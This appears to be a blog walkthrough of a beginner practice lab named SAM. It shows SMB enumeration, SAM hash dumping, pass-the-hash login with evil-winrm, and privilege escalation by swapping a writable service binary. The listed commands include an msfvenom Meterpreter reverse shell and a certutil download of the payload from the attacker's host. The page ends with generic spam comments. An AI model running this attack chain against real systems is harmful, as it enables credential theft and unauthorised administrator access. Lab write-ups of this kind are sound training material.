Premise
In this walkthrough, we demonstrated basic windows privilege escalation by replacing the service executable with our own payload. We also demonstrated the retrieval of Windows passwords from the SAM file.
Machine Name: SAM
Difficulty: Beginner
Skills Learned
- Windows Privilege Escalation
- Services exploitation
Finding a Way In
My first step was to run an Nmap scan to see what services were running. I found that SMB and RDP were open, but there was no web server, FTP, or SSH. This narrowed down my options, so I decided to focus on the SMB shares.
I used the smbclient
command to list the available shares and found one called “backups.” I mounted this share and discovered that it contained a dump of the entire C drive. This is not something you’d typically see in a real-world scenario, but it made my job a lot easier!
With access to the file system, I navigated to the C:\Windows\System32\config
directory and used a tool called samdump2
to extract the password hashes from the SAM file. I found a hash for a user named “jamie,” which I then used to log in with a tool called evil-winrm
. This gave me a PowerShell session on the machine, but I was still just a regular user.
Becoming the Admin
Now that I had a shell, my next goal was to become the administrator. I started by enumerating the services running on the machine and found a couple of interesting ones called “Monitor One” and “Monitor Two.” I used the icacls
command to check the permissions on the monitor2.exe
binary and discovered that the “Users” group had full control over it. This meant that I could replace the legitimate monitor2.exe
with a malicious payload of my own.
I used msfvenom
to create a Windows Meterpreter reverse TCP payload and named it monitor2.exe
. I then set up a Python web server on my machine to host the payload and used certutil
on the target machine to download it.
With my malicious payload in place, all that was left to do was restart the “Monitor Two” service. I used the sc stop
and sc start
commands to do this, and as soon as the service started, it executed my payload and gave me a Meterpreter session with full administrator privileges! 👑
Even though I ran into some issues with the Meterpreter session being unstable, the core concept of exploiting a writable service to escalate privileges is a valuable one to know.
Commands I Used
Here are some of the key commands I used during this process:
- Listing SMB shares:
smbclient -L //172.31.1.12
- Mounting an SMB share:
sudo mount -t cifs //172.31.1.12/backups /mnt/sam -o username=admin,password=
- Dumping SAM hashes:
samdump2 SYSTEM SAM > sam_hashes.txt
- Logging in with
evil-winrm
:ruby evil-winrm.rb -i 172.31.1.12 -u jamie -H <NTLM_HASH>
- Checking file permissions:
icacls C:\services\monitor2.exe
- Generating a payload with
msfvenom
:msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.0.12 LPORT=4444 -f exe -o monitor2.exe
- Starting a Python web server:
python -m http.server 8000
- Downloading a file with
certutil
:certutil.exe -urlcache -f http://10.10.0.12:8000/monitor2.exe monitor2.exe
- Starting and stopping a service:
sc stop monitor2
andsc start monitor2
This is one awesome article. Really looking forward to read more. Great. Lyndsey Terrence Monagan
Thanks for the blog article.Really looking forward to read more. Really Cool.
Really enjoyed this article.Thanks Again. Great.